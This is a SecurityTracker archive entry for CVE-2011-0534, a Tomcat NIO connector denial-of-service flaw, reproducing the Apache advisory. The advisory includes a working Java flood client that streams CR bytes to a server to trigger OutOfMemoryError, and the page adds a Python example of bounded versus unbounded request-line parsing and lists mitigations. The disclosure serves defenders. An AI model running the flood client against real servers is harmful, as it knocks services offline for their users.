SecurityTracker.com
SecurityTracker Archives
Category: Application (Web Server/CGI) > Apache Tomcat
Vendors: Apache Software Foundation
Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
SecurityTracker Alert ID:  1025027
SecurityTracker URL:  http://securitytracker.com/id/1025027
CVE Reference:   CVE-2011-0534   (Links to External Site)
Date:  Feb 7 2011
Impact:   Denial of service via network
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 6.0.0 to 6.0.30, 7.0.0 to 7.0.6
Description:   A vulnerability was reported in Apache Tomcat. A remote user can cause denial of service conditions.

Tomcat does not enforce the maxHttpHeaderSize limit when parsing the request line in the NIO HTTP connector. A remote user can send specially crafted data to trigger an OutOfMemoryError.

Impact:   A remote user can cause denial of service conditions.
Solution:   The vendor has issued a fix (7.0.8).
Vendor URL:  tomcat.apache.org/security.html (Links to External Site)
Cause:   State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Mar 11 2011 (Red Hat Issues Fix for JBoss) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service   (bugzilla@redhat.com)
Red Hat has issued a fix for JBoss Enterprise Web Server 1.0.
Mar 11 2011 (Red Hat Issues Fix for JBoss) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service   (bugzilla@redhat.com)
Red Hat has issued a fix for JBoss Enterprise Web Server 1.0.1.
Jul 22 2011 (Novell Issues Fix for Novell Vibe OnPrem) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
Novell has issued a fix for Novell Vibe OnPrem.
Jul 22 2011 (Novell Issues Fix for Novell Teaming) Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
Novell has issued a fix for Novell Teaming.



 Source Message Contents

Date:  Sat, 05 Feb 2011 02:05:38 +0000
Subject:  [SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability

CVE-2011-0534 Apache Tomcat DoS vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.6
- Tomcat 6.0.0 to 6.0.30

Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the
request line in the NIO HTTP connector. A specially crafted request
could trigger a DoS via an OutOfMemoryError.

Example (AL2 licensed):
package bug50631;

import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;

public class FloodClient1 {
    static final int k_step = 10;                    // KB written per iteration
    static byte[] value = new byte[k_step * 1024];   // one 10 KB block

    public static void main(String[] args) throws Exception {
        // Fill the block with CR (0x0D) bytes; no LF is ever sent, so the
        // request line never terminates and the connector keeps buffering.
        int i = 0;
        while (i < value.length) {
            value[i++] = 13;
        }
        SocketAddress addr = new InetSocketAddress("localhost", 8080);
        Socket socket = new Socket();
        socket.setSoTimeout(0);   // 0 = no read timeout
        socket.connect(addr, 0);  // 0 = no connect timeout
        OutputStream os = socket.getOutputStream();
        // InputStream is = socket.getInputStream();

        int k = k_step;     // KB sent within the current MB
        int m = 0;          // MB sent so far
        int k100 = 100;     // next 100 KB progress mark
        while (m < 2000) {  // stop after 2000 MB
            if (k >= k100) {
                k100 += 100;
                System.out.print('.');
                System.out.flush();
            }
            if (k >= 1024) {
                m++;
                k -= 1024;
                k100 = 100;
                System.out.println(" " + m + " Mb");
            }
            os.write(value);
            os.flush();
            Thread.sleep(1);
            k += k_step;
        }
    }
}

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to a Tomcat version where this issue is fixed
- Use a BIO or AJP HTTP connector in place of an NIO HTTP connector
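The defect named in the Description above, and what the fix changes, as an added illustration (written for this page in Python, not Tomcat's own code): two readers of an HTTP request line, one that buffers until it sees LF and one that applies a byte budget equivalent to maxHttpHeaderSize before every read. The CrFlood class is a constructed stand-in for the client in the example above (it sends only CR bytes and never an LF), and the 8192-byte default, the function names and the helper that counts bytes buffered per connection are this example's own choices.

```python
import io

MAX_HTTP_HEADER_SIZE = 8192  # assumed default budget, in bytes, for the request line


class RequestTooLarge(Exception):
    """Raised instead of letting the buffer grow; a server answers 400/414 and closes."""


class CrFlood:
    """Constructed stand-in for the flooding client: a stream that yields only CR
    bytes (0x0D) and never the LF that would terminate the request line."""

    def __init__(self, total):
        self.total = total  # bytes the "client" sends before closing
        self.sent = 0

    def read(self, n):
        n = min(n, self.total - self.sent)
        self.sent += n
        return b"\r" * n


def read_request_line_unbounded(stream):
    """The vulnerable shape: append chunks until an LF appears. Per-connection
    memory is bounded only by what the client chooses to send."""
    buf = bytearray()
    while True:
        chunk = stream.read(4096)
        if not chunk:
            raise ConnectionError("client closed before end of request line")
        buf += chunk
        lf = buf.find(b"\n")
        if lf != -1:
            return bytes(buf[:lf]).rstrip(b"\r")


def read_request_line_bounded(stream, limit=MAX_HTTP_HEADER_SIZE):
    """The fixed shape: the same loop, but it never reads past `limit` bytes for
    the request line, so a flood is rejected after at most `limit` bytes."""
    buf = bytearray()
    while True:
        remaining = limit - len(buf)
        if remaining <= 0:
            raise RequestTooLarge(f"request line exceeds {limit} bytes")
        chunk = stream.read(min(4096, remaining))
        if not chunk:
            raise ConnectionError("client closed before end of request line")
        buf += chunk
        lf = buf.find(b"\n")
        if lf != -1:
            return bytes(buf[:lf]).rstrip(b"\r")


def parse_request_line(line):
    """Split a terminated line into (method, target, version); anything that is
    not exactly three tokens with an HTTP/ version is rejected."""
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        raise ValueError("malformed request line")
    return tuple(parts)


def handle_request_line(data, limit=MAX_HTTP_HEADER_SIZE):
    """Bounded read plus parse over an in-memory byte string (convenience wrapper)."""
    return parse_request_line(read_request_line_bounded(io.BytesIO(data), limit))


def bytes_buffered_under_flood(reader, flood_bytes):
    """Run `reader` against a CR flood of `flood_bytes` and report how many bytes
    it consumed before giving up: the memory one connection would have held."""
    stream = CrFlood(flood_bytes)
    try:
        reader(stream)
    except (RequestTooLarge, ConnectionError):
        pass
    return stream.sent


if __name__ == "__main__":
    print(handle_request_line(b"GET /index.html HTTP/1.1\r\nHost: example\r\n\r\n"))
    flood = 1024 * 1024  # one constructed MB of CR bytes
    print("unbounded reader buffered:", bytes_buffered_under_flood(read_request_line_unbounded, flood))
    print("bounded reader buffered:  ", bytes_buffered_under_flood(read_request_line_bounded, flood))
```

With a 1 MB flood the unbounded reader holds the whole megabyte for that one connection (and the PoC above sends up to 2000 MB per socket), while the bounded reader stops at the 8192-byte budget and closes the connection. This is why the listed mitigations work: the fixed releases apply the connector's maxHttpHeaderSize to the request line as well as the headers, and the BIO and AJP connectors were not affected by the missing check.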

Credit:
The issue was identified by the Tomcat security team.

References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html








Copyright 2014, SecurityGlobal.net LLC